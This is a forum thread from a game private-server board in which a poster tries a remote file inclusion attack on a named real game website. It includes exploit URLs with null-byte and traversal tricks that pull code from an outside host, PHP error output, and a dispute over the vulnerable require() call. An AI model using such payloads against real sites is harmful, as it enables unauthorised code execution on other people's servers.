Register for your free account! | Forgot your password?

Go Back   elitepvpers > MMORPGs > Last Chaos > Last Chaos Private Server
You last visited: Today at 13:51

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



[File Inclusion] Eternia Games

Discussion on [File Inclusion] Eternia Games within the Last Chaos Private Server forum part of the Last Chaos category.

Reply
 
Old   #1
 
elite*gold: 0
Join Date: Oct 2012
Posts: 2
Received Thanks: 2
[File Inclusion] Eternia Games

Here to show you a little exploit on Eternia's website that would almost allow you to execute any of your own scripts under web server privileges (a shell or whatever) with ease. This is only to show you why you should always turn allow_url_fopen off in your php configuration.

Code:
http://lastchaos.eterniagames.com/s_ep3/?lang=http://site.com/code.txt%00
Which gives us a result of.

Code:
Warning: require(_cache/lang.http://site.com/code.txt) [function.require]: failed to open stream: No such file or directory in /var/www/vhosts/eterniagames.com/subdomains/lastchaos/httpdocs/s_ep3/index.config.php on line 514
If the server permitted traversal we could simply do the following to jump down two directories.

Code:
http://lastchaos.eterniagames.com/s_ep3/?lang=..%2f..%2fhttp://site.com/code.txt%00
And inject our own code into the site. This is for learning purposes only. I suggest not attacking random servers thinking this is going to work, because it wont. This just goes to show some of the biggest servers, aren't always the securest.
WarmongerR7 is offline  
Old 10/15/2012, 19:58   #2

 
elite*gold: 4186
Join Date: Jul 2012
Posts: 274
Received Thanks: 2,037
This Website "Error" is totally worth it you are WRONG. You cant inject anything there.

The Source looks like this :
PHP Code:
require('lang.' $_GET['lang'] . '.php'); 
Your Injection Point :
PHP Code:
require('lang.INJECTION.php'); 
You cant paste any Code in there. There is no way to Request other Files except the Files on there own FTP called "lang." at the start.
I found this befor but it does not give any vulnerable point thats why i didnt post it, anyway good work for the Start.
FapMax is offline  
Thanks
7 Users
Old 10/15/2012, 20:24   #3
 
elite*gold: 0
Join Date: Oct 2012
Posts: 7
Received Thanks: 3
Quote:
Originally Posted by FapMax View Post
This Website "Error" is totally worth it you are WRONG. You cant inject anything there.

The Source looks like this :
PHP Code:
require('lang.' $_GET['lang'] . '.php'); 
Your Injection Point :
PHP Code:
require('lang.INJECTION.php'); 
You cant paste any Code in there. There is no way to Request other Files except the Files on there own FTP called "lang." at the start.
I found this befor but it does not give any vulnerable point thats why i didnt post it, anyway good work for the Start.
You are wrong, this hole isn't abusable because of the parameters existing server side. It would be possible to execute a shell on the web server if it allowed traversal, but it does not (like I explained to you in the first post). This is to teach you how to setup server software properly (i.e. PHP) so you don't end up hacked with a similar hole. Also your injection point is wrong.

Code:
require(_cache/lang.<injection point>%00);
Also the server side code most likely looks like this.

Code:
require($_GET['cache'] . $_GET['lang'] . '.php');
If you have any more questions feel free to ask. If you would like help securing your website/server feel free to pm me, and we will negotiate.
WarmongerR8 is offline  
Old 10/15/2012, 20:30   #4
 
elite*gold: 0
Join Date: Oct 2012
Posts: 291
Received Thanks: 73
Oh Nooo WarmongerR7 Are Banned now WarmongerR8

This generation will never End
Wayne...? is offline  
Thanks
1 User
Old 10/15/2012, 22:01   #5

 
elite*gold: 4186
Join Date: Jul 2012
Posts: 274
Received Thanks: 2,037
Quote:
Originally Posted by WarmongerR8 View Post
You are wrong, this hole isn't abusable because of the parameters existing server side. It would be possible to execute a shell on the web server if it allowed traversal, but it does not (like I explained to you in the first post). This is to teach you how to setup server software properly (i.e. PHP) so you don't end up hacked with a similar hole. Also your injection point is wrong.

Code:
require(_cache/lang.<injection point>%00);
Also the server side code most likely looks like this.

Code:
require($_GET['cache'] . $_GET['lang'] . '.php');
If you have any more questions feel free to ask. If you would like help securing your website/server feel free to pm me, and we will negotiate.
******, i loled : "$_GET['cache']" xD
Read please.
FapMax is offline  
Thanks
8 Users
Old 10/15/2012, 22:09   #6
 
elite*gold: 0
Join Date: Oct 2012
Posts: 7
Received Thanks: 3
Quote:
Originally Posted by FapMax View Post
Retard, i loled : "$_GET['cache']" xD
Read please.

PS: Enjoy your Ban.
My bad, drunk and high. Here is what it should look like.

Code:
require($settings['cache'] . $_GET['lang'] . '.php');
Again, if you have any questions feel free to ask.

Quote:
Originally Posted by FapMax View Post

PS: Enjoy your Ban.
I'll be here forever, to teach kiddies like you.
WarmongerR8 is offline  
Reply


Similar Threads Similar Threads
Last chaos Eternia ep1 Patch file is crashed!!!
07/14/2011 - Last Chaos Private Server - 1 Replies
Hallo wenn ich lc eternia ep1 starten will steht da immer Patch file ich crashed Program must running again. :( Habe mal geschaud und weiß das sowas eig in sammeltherd kommt oder ins lc problem forum aber ich finde da einfach nichts. Avira ist aus und habe windows xp Hoffent lich könnt ihr mir helfen Danke schonmal im vorraus MfG Blumbis
Paying for Eternia dekaron Ct file
10/13/2009 - Dekaron Private Server - 10 Replies
im sick of trying to find working offsets and getting nowhere... if anyone can provide me with a ct file with working vac and non aggro ill pay you whatever you want on eternia. my msn is [email protected] CLOSE PLEASE I FIGURED IT OUT.....answer was right in front of me the whole timeX



All times are GMT +2. The time now is 13:51.


Powered by vBulletin®
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2024 elitepvpers All Rights Reserved.